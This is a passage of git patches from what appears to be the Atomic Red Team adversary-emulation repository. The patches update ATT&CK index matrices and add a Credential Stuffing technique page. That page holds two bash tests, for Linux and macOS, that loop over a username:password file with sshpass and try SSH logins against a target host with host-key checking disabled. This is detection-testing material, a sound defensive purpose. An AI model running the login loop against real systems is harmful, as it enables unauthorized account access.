Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index b4352dce..9d447e38 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md 
@@ -4,7 +4,7 @@ | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Default Accounts [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index acd405f4..bdd2eed9 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -10,7 +10,7 @@ | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API 
Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) 
| Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9cb1ac61..fd5147ce 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -831,7 +831,72 @@ credential-access: x_mitre_contributors: - Diogo Fernandes - Anastasios Pingios - atomic_tests: [] + identifier: T1110.004 + atomic_tests: + - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad + description: 'Using username,password combination from a password dump to login + over SSH. + +' + supported_platforms: + - linux + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + dependency_executor_name: bash + dependencies: + - description: 'Requires SSHPASS + +' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || + [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo + apt install sshpass -y; else echo "This test requires sshpass" ; fi ; + +' + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + description: 'Using username,password combination from a password dump to login + over SSH. + +' + supported_platforms: + - macos + input_arguments: + target_host: + description: IP Address / Hostname you want to target. 
+ type: String + default: localhost + dependency_executor_name: bash + dependencies: + - description: 'Requires SSHPASS + +' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" + brew install hudochenkov/sshpass/sshpass + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done T1552.001: technique: id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md new file mode 100644 index 00000000..54dcd9de --- /dev/null +++ b/atomics/T1110.004/T1110.004.md @@ -0,0 +1,115 @@ +# T1110.004 - Credential Stuffing +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/004) +
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
+
+Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
+
+Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
+
+* SSH (22/TCP)
+* Telnet (23/TCP)
+* FTP (21/TCP)
+* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
+* LDAP (389/TCP)
+* Kerberos (88/TCP)
+* RDP / Terminal Services (3389/TCP)
+* HTTP/HTTP Management Services (80/TCP & 443/TCP)
+* MSSQL (1433/TCP)
+* Oracle (1521/TCP)
+* MySQL (3306/TCP)
+* VNC (5900/TCP)
+
+In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
+
+## Atomic Tests
+
+- [Atomic Test #1 - SSH Credential Stuffing From Linux](#atomic-test-1---ssh-credential-stuffing-from-linux)
+
+- [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos)
+
+
+
+
+## Atomic Test #1 - SSH Credential Stuffing From Linux
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+```
+
+
+
+
+
+
+
+## Atomic Test #2 - SSH Credential Stuffing From MacOS
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** macOS
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+brew install hudochenkov/sshpass/sshpass
+```
+
+
+
+
+
From 130328dafc7f5c9774ca206fa674b3353aefe199 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 20:04:34 +0000 Subject: [PATCH 33/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1036.005/T1036.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 4c81dd2d..2dc6b7b9 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -4,6 +4,7 @@ display_name: 'Masquerading: Match Legitimate Name or Location' atomic_tests: - name: Execute a process from a directory masquerading as the current parent directory. + auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 description: | Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f60266d0..6b32dc04 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -718,3 +718,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 437b2003-a20d-4ed8-834c-4964f24eec63 4f08197a-2a8a-472d-9589-cd2895ef22ad d546a3d9-0be5-40c7-ad82-5a7d79e1b66b +812c3ab8-94b0-4698-a9bf-9420af23ce24 From ecc7d70057bcbfb2879c763651393347e27d21ce Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 20:04:40 +0000 Subject: [PATCH 34/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/linux-index.md | 3 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/macos-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 28 ++++++++++- atomics/T1036.005/T1036.005.md | 47 +++++++++++++++++++ 14 files changed, 89 insertions(+), 10 deletions(-) create mode 100644 atomics/T1036.005/T1036.005.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 969f8c8f..cdeac0bd 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"
techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.